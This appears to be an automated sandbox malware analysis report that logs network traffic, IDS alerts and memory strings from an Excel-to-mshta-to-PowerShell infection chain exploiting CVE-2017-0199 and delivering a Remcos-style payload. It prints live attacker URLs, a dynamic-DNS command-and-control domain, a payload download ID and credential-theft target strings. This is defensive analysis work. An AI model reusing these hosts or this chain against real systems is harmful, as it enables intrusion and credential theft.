Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49165

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.174.146.46:80 -> 192.168.2.22:49162
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.174.146.46:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 107.175.130.20:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 107.175.130.20:14645
Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 107.174.146.46:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 107.174.146.46:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 107.174.146.46:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.185.65:443 -> 192.168.2.22:49167
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 172.217.16.193:443 -> 192.168.2.22:49175

Uses dynamic DNS services

Source: unknown

DNS query: name: seemebest2024rmc.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49176 -> 107.175.130.20:14645

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/RFGGVFRR.txt HTTP/1.1Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.162.95 172.67.162.95
Source: Joe Sandbox View	IP Address: 104.21.74.191 104.21.74.191
Source: Joe Sandbox View	IP Address: 107.175.130.20 107.175.130.20
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49177 -> 178.237.33.50:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.174.146.46If-Range: "33796-625b5448e34a0"
Source: global traffic	HTTP traffic detected: GET /57/picturewithgreatnewswithgoodthingsonbestplace.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 17:45:29 GMTConnection: Keep-AliveHost: 107.174.146.46If-None-Match: "33796-625b5448e34a0"

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49175 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_000007FE899B4B18 URLDownloadToFileW,

5_2_000007FE899B4B18

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AA02F62.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.174.146.46If-Range: "33796-625b5448e34a0"
Source: global traffic	HTTP traffic detected: GET /57/picturewithgreatnewswithgoodthingsonbestplace.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 17:45:29 GMTConnection: Keep-AliveHost: 107.174.146.46If-None-Match: "33796-625b5448e34a0"
Source: global traffic	HTTP traffic detected: GET /57/RFGGVFRR.txt HTTP/1.1Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: CasPol.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000002E.00000002.521421679.00000000003DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000002E.00000002.521421679.00000000003DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 0000001F.00000002.514784268.0000000001D7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login#H equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000001F.00000002.514784268.0000000001D7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login#H equals www.yahoo.com (Yahoo)
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: acesso.run
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: seemebest2024rmc.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/
Source: mshta.exe, 00000010.00000003.462590642.00000000003C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.460408085.000000000327D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
Source: mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...Q5
Source: mshta.exe, 00000004.00000002.412322987.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.412104448.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta.NET4.0C;
Source: mshta.exe, 00000004.00000003.409103792.0000000003683000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.0000000003683000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaC:
Source: mshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaE
Source: mshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaN
Source: mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.0000000000391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaain
Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaepC:
Source: mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.000000000037E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestrain
Source: mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestraino4
Source: mshta.exe, 00000004.00000003.410387499.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.408514038.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463384059.0000000003275000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.461250069.0000000003275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htahttp://107.174.146.46/5
Source: mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htal
Source: mshta.exe, 00000004.00000003.409103792.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htant
Source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000002555000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/picture
Source: powershell.exe, 00000012.00000002.477548914.0000000002121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.479984723.000000001B1D3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.479984723.000000001B216000.00000004.00000020.00020000.00000000.sdmp, bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIF
Source: powershell.exe, 00000012.00000002.479984723.000000001B1D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFC:
